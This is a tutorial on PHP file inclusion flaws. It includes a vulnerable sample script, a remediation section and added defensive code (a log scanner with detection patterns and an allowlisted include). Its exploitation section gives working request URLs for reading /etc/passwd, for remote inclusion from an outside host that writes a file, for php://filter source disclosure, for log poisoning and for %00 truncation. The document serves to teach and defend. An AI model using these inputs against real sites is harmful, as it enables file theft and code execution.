Analysis of File inclusion vulnerabilities

Source: Internet
Author: User
Tags: apache log, file, base64, phpinfo
0x00 File inclusion: concept and classification

Program developers usually put functions that will be reused into a single file; a script that needs one of those functions simply includes that file and calls the function directly, without having to write it again.


File inclusion comes in two types:
Local file inclusion
Remote file inclusion: a remote file is loaded. This requires the allow_url_include and allow_url_fopen options to be enabled in php.ini; once they are, arbitrary code can be executed directly.

0x01 Cause of the vulnerability

For flexibility, developers usually store the name of the file to be included in a variable and then include that file dynamically. But precisely because the call is so flexible, a user may be able to make the program include a malicious file, and that is what produces a file inclusion vulnerability.



0x02 PHP file inclusion functions
include()

With this function, the file is included only when execution reaches the call; if an error occurs, a warning is issued and execution continues.


include_once()

Same functionality as the former, except that when the same file is included repeatedly it is loaded only once.


require()

With this function the file is included as soon as the program runs; if an error occurs, an error message is printed and the program terminates immediately.


require_once()
Same functionality as the former, except that when the same file is included repeatedly it is loaded only once.
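The four behaviours described above, demonstrated in an added example that is not part of the original article: it creates a throwaway counter.php in the system temp directory (a constructed file, not anything from the article), includes it through each construct, and ends with a require() of a missing file so the difference between "warn and continue" and "terminate" is visible.

```php
<?php
// Added example (not from the original article): behavioural differences
// between include(), include_once(), require() and require_once().
// counter.php is a constructed helper created below for the demo only.

declare(strict_types=1);

$dir = sys_get_temp_dir() . '/inc_demo_' . getmypid();
mkdir($dir);
// Every time this file is loaded it increments a global counter.
file_put_contents("$dir/counter.php", '<?php $GLOBALS["loads"] = ($GLOBALS["loads"] ?? 0) + 1;');

// Remove the temp file on shutdown; registered early because the final
// require() below stops the script with a fatal error, and shutdown
// functions still run after a fatal error.
register_shutdown_function(function () use ($dir): void {
    @unlink("$dir/counter.php");
    @rmdir($dir);
});

// include(): loads the file every time the call is executed.
include "$dir/counter.php";
include "$dir/counter.php";
echo "after two include():       loads = {$GLOBALS['loads']}\n";

// include_once(): PHP checks whether the resolved path was already included
// by any construct, so these calls do not load the file again.
include_once "$dir/counter.php";
include_once "$dir/counter.php";
echo "after two include_once():  loads = {$GLOBALS['loads']}\n";

// require_once(): same deduplication rule as include_once().
require_once "$dir/counter.php";
echo "after require_once():      loads = {$GLOBALS['loads']}\n";

// include() of a missing file raises E_WARNING (silenced here with @),
// returns false, and the script keeps running.
$r = @include "$dir/missing.php";
echo 'include of a missing file returned: ' . var_export($r, true) . "\n";

// require() of a missing file raises a fatal E_COMPILE_ERROR: the script
// stops here and the line after it is never executed.
require "$dir/missing.php";
echo "this line is never reached\n";
```

Run it from the command line with php; the last echo never appears, which is exactly why a dynamically chosen path handed to require() is as dangerous as one handed to include(): the attacker-controlled file is executed either way, the constructs differ only in how a missing file is reported.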


0x03 Vulnerable code example

<?php
// The value of the test parameter is included without any validation.
if ($_GET['test']) {
	include($_GET['test']);
} else {
	include('index.php');
}
?>
Normal URL access: http://www.test.com/index.php?test=xxx.php
Accessing this URL will include xxx.php, but because xxx.php does not exist the inclusion fails with an error, which very likely discloses the absolute path of the site.
This is only a simple test; an attacker can just as well change the value of the test parameter to include and execute malicious code.



0x04 Exploiting PHP file inclusion
Read sensitive files
Access http://www.test.com/index.php?test=/etc/passwd; if the file exists on the target host and is readable, its contents are returned.

Remote inclusion of a shell
This uses remote file inclusion. Make sure the target host has the allow_url_fopen option enabled, and put the test code in the remote file http://www.test1.com/test.txt:
<?php fputs(fopen("text.php", "w"), "<?php phpinfo(); ?>"); ?>

Access http://www.test.com/index.php?test=http://www.test1.com/test.txt, and the file text.php is generated in the web root of the site, containing: <?php phpinfo(); ?>


Upload an image and include the image shell
The same method as above, except this time the inclusion is local: write the test code directly into the uploaded image, then access the vulnerable script with the image's path as the parameter.


Using pseudo-protocols (stream wrappers)
Read a PHP file: accessing http://www.test.com/index.php?test=php://filter/read=convert.base64-encode/resource=config.php returns the file as a Base64-encoded string; decode it with any Base64 tool to see the original content.


Include a log file to get a shell
Condition: know where the log file access.log is stored.
Finding it:
Since a file inclusion vulnerability already exists, it can be used to read the Apache configuration file and find the location of the log file.
Default location: /var/log/httpd/access_log
Use:
Typically, once Apache is running, two log files, access.log and error.log, are generated by default; access.log records information about every request from clients, and it still records the request when the requested resource does not exist.

If the target site has a file inclusion vulnerability but there is no suitable file to include, we can try accessing http://www.test.com/<?php phpinfo(); Apache records this request in access.log, and including access.log through the vulnerability then triggers it. That is the theory; in practice the input code is URL-escaped by the browser and is not parsed. Is that the end of it? No: the attacker can capture the request with the Burp Suite tool and, in the raw HTTP request, change the escaped code back into the plain test code. The Apache log file then shows the plain test code.
At that point, accessing http://test.com/index.php?test=[log file path] executes the test code.
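From the defender's side, the inclusion and log-poisoning attempts described in this section leave characteristic traces in access.log itself. The following scanner is an added example, not code from the original article: it runs a set of indicator patterns over a handful of constructed log lines (the addresses, timestamps and paths are made up for the demo) and reports which lines look like traversal, null-byte truncation, php:// wrapper use, remote inclusion, sensitive-file reads, or PHP tags written into the request line.

```php
<?php
// Added example (not from the original article): scan Apache access-log
// lines for file-inclusion and log-poisoning indicators.
// Sample log lines at the bottom are constructed for this demo.

declare(strict_types=1);

// Indicator name => PCRE pattern. Each line is tested both raw and
// URL-decoded, so "%2e%2e/" and "../" are caught alike.
const INDICATORS = [
    'traversal'      => '~(?:\.\./|\.\.\\\\)~',
    'null_byte'      => '~%00~',
    'php_wrapper'    => '~\bphp://~i',
    'remote_include' => '~=\s*(?:https?|ftp)://~i',
    'log_poisoning'  => '~<\?php~i',
    'sensitive_file' => '~/etc/passwd|access[_.]log|error[_.]log~i',
];

/**
 * Return the list of indicator names that match one log line.
 */
function classifyLine(string $line): array
{
    $hits = [];
    $candidates = [$line, rawurldecode($line)];
    foreach (INDICATORS as $name => $regex) {
        foreach ($candidates as $candidate) {
            if (preg_match($regex, $candidate) === 1) {
                $hits[] = $name;
                break; // one hit per indicator is enough
            }
        }
    }
    return $hits;
}

/**
 * Map 1-based line number => indicator names, for lines with any hit.
 */
function scanLog(array $lines): array
{
    $report = [];
    foreach ($lines as $i => $line) {
        $hits = classifyLine($line);
        if ($hits !== []) {
            $report[$i + 1] = $hits;
        }
    }
    return $report;
}

// Constructed sample: one benign request followed by the patterns
// discussed in 0x04. None of these are real hosts or real traffic.
$sample = [
    '10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /index.php?test=about HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2020:10:00:01 +0000] "GET /index.php?test=/etc/passwd HTTP/1.1" 200 1812',
    '10.0.0.9 - - [01/Jan/2020:10:00:02 +0000] "GET /index.php?test=php://filter/read=convert.base64-encode/resource=config.php HTTP/1.1" 200 3000',
    '10.0.0.9 - - [01/Jan/2020:10:00:03 +0000] "GET /index.php?test=1.jpg%00 HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jan/2020:10:00:04 +0000] "GET /index.php?test=http://www.test1.com/test.txt HTTP/1.1" 200 44',
    '10.0.0.9 - - [01/Jan/2020:10:00:05 +0000] "GET /<?php phpinfo(); HTTP/1.1" 404 209',
    '10.0.0.9 - - [01/Jan/2020:10:00:06 +0000] "GET /index.php?test=..%2F..%2F..%2Fvar/log/httpd/access_log HTTP/1.1" 200 9000',
];

foreach (scanLog($sample) as $lineNo => $hits) {
    printf("line %d: %s\n", $lineNo, implode(', ', $hits));
}
```

Line 1 produces no output; every other line is flagged by at least one indicator, and line 7 by two (traversal and sensitive_file). In production the same classifyLine() would be fed from a tail of the real log, and a hit on log_poisoning is the signal that access.log itself has become an include target and should be rotated or moved, which is one of the remediations listed in 0x05.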

Truncation in inclusion
Vulnerable code:

<?php
// Appending a fixed extension is meant to limit which files can be included.
if (isset($_GET['test'])) {
	include($_GET['test'] . '.php');
} else {
	include('index.php');
}
?>
This does fix the vulnerability to some extent, but an attacker can still bypass it with truncation techniques.
Upload an image containing a one-line webshell as before and access http://test.com/index.php?test=1.jpg: this fails, because the included file 1.jpg.php does not exist. However, requesting http://test.com/index.php?test=1.jpg%00 will most likely bypass the check. This only works when php.ini has magic_quotes_gpc=off and the PHP version is below 5.3.4; if it is on, %00 is escaped and cannot truncate the path.

There is also path-length truncation, which is rarely seen nowadays. It applies at least to PHP versions below 5.2.8 (unverified; not tested).
Example: http://test.com/index.php?test=1.jpg../../../../../../... (the path must be longer than 256 bytes on Windows and longer than 4,096 bytes on Linux)



0x05 Remediation
Disable remote file inclusion: allow_url_include=off
Configure open_basedir to the specific directory and restrict file access to that area.
Filter ../ and other special characters.
Change the location of the Apache log files.
Enable magic quotes: magic_quotes_gpc=on
Try not to use dynamic variables to select the file; write the file to be included directly in the code.
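A hardened replacement for the include($_GET['test']) pattern from 0x03, as an added example (not code from the original article): the user supplies a page key, never a path, and the key is looked up in a fixed allowlist, so traversal sequences, %00, php:// wrappers and remote URLs never reach include(). As a second layer the resolved file is checked to lie inside the expected directory, mirroring what open_basedir enforces at the php.ini level. The ./pages/ directory and the page names are hypothetical.

```php
<?php
// Added example (not from the original article): allowlisted inclusion
// instead of include($_GET['test']). Directory and page names below are
// hypothetical placeholders for the demo.

declare(strict_types=1);

// Permitted page keys and the files they map to. The request never
// contains a path, only one of these keys.
const PAGE_MAP = [
    'index'   => 'index.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Resolve a requested page key to an absolute path inside $baseDir,
 * or return null if the key is unknown or the file escapes the directory.
 */
function resolvePage(string $requested, string $baseDir): ?string
{
    // Layer 1: strict allowlist on the key itself.
    if (!array_key_exists($requested, PAGE_MAP)) {
        return null;
    }

    // Layer 2: defence in depth. realpath() returns false for a missing
    // file and collapses any ../ or symlink, so a prefix comparison on the
    // canonical path is a reliable containment check.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGE_MAP[$requested]);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Only plain strings are accepted; arrays (test[]=...) fall back to index.
$key = (isset($_GET['test']) && is_string($_GET['test'])) ? $_GET['test'] : 'index';

$file = resolvePage($key, __DIR__ . '/pages');
if ($file === null) {
    http_response_code(404);
    exit('Page not found');
}

include $file;
```

With this structure the .php suffix trick from the truncation section is unnecessary, because the extension is part of the allowlisted value rather than appended to user input. Keep allow_url_include=off and an open_basedir setting in php.ini regardless: the allowlist protects this one script, the php.ini directives protect every script on the host.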
